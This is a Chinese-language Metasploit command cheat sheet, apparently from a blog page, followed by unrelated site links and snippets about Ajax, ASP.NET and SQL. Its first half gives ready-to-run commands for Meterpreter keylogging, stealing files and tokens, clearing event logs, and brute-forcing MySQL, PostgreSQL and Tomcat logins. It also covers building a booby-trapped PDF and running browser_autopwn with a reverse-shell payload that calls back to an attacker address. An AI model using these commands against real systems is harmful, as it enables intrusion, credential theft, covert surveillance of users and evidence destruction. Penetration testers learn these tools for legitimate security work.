msfconsole的命令:
msfconsole
use module :这个命令允许你开始配置所选择的模块。
set optionname module :这个命令允许你为指定的模块配置不同的选项。
exploit :这个命令启动漏洞利用模块
run :这个命令启动非漏洞利用模块。
search module :这个命令允许你搜索独立模块。
help
exit


msfcli的命令:
msfcli
msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
msf -h


Meterpreter 执行实际的载荷分发和漏洞利用工作:
background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
download :这个命令允许你从受害者机器中下载文件。
upload :这个命令允许你向受害者机器上传文件。
execute :这个命令允许你在受害者机器上运行命令。
shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
session -i :这个命令允许你在会话之间切换。


开始记录目标系统中用户的击键顺序:
keyscan_start

转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
keyscan_dump

停止记录目标系统中用户的击键顺序。
keyscan_stop

删除目标系统中的文件。
del exploited.docx

清除目标系统中的事件日志。
clearav

展示运行进程的列表。
ps

杀掉受害者系统的指定进程,使用 kill [pid] 语法。
kill 6353

尝试偷取目标系统上的模拟令牌。
steal_token


msfconsole mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole postgresql
use auxiliary/scanner/mysql/postgres_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole tomcat
use auxiliary/scanner/http/tomcat_mgr_login
show options
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
set RHOSTS 192.168.10.111
set RPORT 8180
exploit


msfconsole
msfconsole pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit


实现 browser_autopwn:
浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
msfconsole autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.109
set URIPATH "filetypes"
exploit
Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
session –I 1

msf、armitage的更多相关文章

  1. 形形色色的软件生命周期模型(4)——MSF、实用型

    摘要: 读大学时,我们曾经学习过不少软件生命周期模型,当时还不是很懂软件开发,你可能会觉得这些东西很新奇.在实际工作中,你会发现这些模型其实很难应用,与此同时你会接触到RUP.MSF等权威软件公司的生 ...

  2. Cobaltstrike、armitage联动

    i 春秋作家:fengzi 原文来自:Cobaltstrike.armitage联动 在使用Cobaltstrike的时候发现他在大型或者比较复杂的内网环境中,作为内网拓展以及红队工具使用时拓展能力有 ...

  3. 第一次亲密接触MSF

    第一次亲密接触MSF Metasploit Framework介绍 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇宙”之名的强 ...

  4. MSF基础攻击实践报告

    MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...

  5. 现代软件工程 第七章 【MSF】练习与讨论

    7.7  移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...

  6. 2018-2019 2 20165203 《网络对抗技术》Exp5 MSF基础

    2018-2019 2 20165203 <网络对抗技术>Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: ...

  7. Metasploit 笔记

    目录一.名词解释···································································· 3二.msf基础··············· ...

  8. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  9. Cobalt Strike系列教程第一章:简介与安装

    Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能.同时,Cobalt St ...

随机推荐

  1. 使用Ajax解析数据遇到的问题

    数据格式 我最近在使用JQuery的$.ajax访问后台的时候,发现竟然无法解析返回的数据,具体的错误记不清了(以后在遇到问题先截个图),可以在浏览器的Console中看到一个错误,但是去看这条请求是 ...

  2. Asp.net mvc 限制路由参数类型

    routes.MapRoute(                "Activity2", // 路由名称                "Activity/{id}&qu ...

  3. 如何查看与分析IIS服务器日志?

    发布时间:2012-12-01 16:17:28.0 作者:青岛做网站   网站日志分析是站长每天的必备工作之一,服务器的一些状况和访问IP的来源都会记录在IIS日志中,所以IIS日志对每个服务器管理 ...

  4. python基础知识之列表、元祖、字典、集合、字符串。

    1.可变类型之列表 列表用 [ ]来定义是可变的,可以通过索引值来去查询里面的字段可以可以追加,删除等 names='zhangyang guyun xiangpeng xuliangwei' nam ...

  5. sqlldr加载 数据文件的字段超出最大长度

    SQLLOAD数据的时候,建表给的字段给够了,建表已经给到VHARCHAR2(1024)了,实际数据是VHARCHAR2(256).加载报错"数据文件的字段超出最大长度"查了半天, ...

  6. 用 Sqlmap 识别 WAF

    命令: ┌─[root@sch01ar]─[~] └──╼ #sqlmap -u "http://www.sch01ar.com/" --identify-waf --batch ...

  7. Python极其简单的分布式异步作业管理系统RQ入门

    Python极其简单的分布式异步作业管理系统RQ入门 原创 2017-08-19 lixing 生信人 Python极其简单的分布式异步作业管理系统RQ入门 1. 什么是Job? Job直译过来就是工 ...

  8. Spring Data MongoDB 三:基本文档查询(Query、BasicQuery

    一.简介 spring Data  MongoDB提供了org.springframework.data.mongodb.core.MongoTemplate对MongoDB的CRUD的操作,上一篇我 ...

  9. jstl格式化页面显示科学计数法问题

    <td content="planEnergy"><fmt:formatNumber value="${gg.planEnergy}" pat ...

  10. Mysql 中的伪列用法

    SELECT ( @rowNO := @rowNo + 1 ) AS rowno, A.*FROM ( SELECT * FROM t_user ) a, ( SELECT @rowNO := 0 ) ...